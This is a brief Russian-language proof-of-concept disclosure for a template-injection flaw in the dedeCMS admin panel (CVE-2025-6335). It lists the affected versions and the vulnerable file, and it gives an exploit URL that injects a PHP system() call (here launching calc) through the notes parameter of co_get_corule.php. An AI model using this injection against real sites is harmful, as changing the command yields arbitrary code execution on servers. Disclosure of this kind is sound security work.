
Эксплойт proof-of-concept для CVE-2025-6335, уязвимости выполнения команд через инъекцию шаблона в dedeCMS 5.7 sp2, позволяющей выполнение произвольных команд через фоновый интерфейс.
BUG_Author: Ewoji
Затронутая версия: dedeCMS < 5.7.2
Вендор: Shanghai Zhuozhuo Network Technology Co., LTD
ПО: dedeCMS
Уязвимые файлы:
/include/dedetag.class.phpПосле установки войдите в панель администратора
Эксплуатация шаблона
Проверка эксплуатации:
/dede/co_get_corule.php?notes={dede:\");system('calc');///}&job=1
Accessing twice like this can execute the command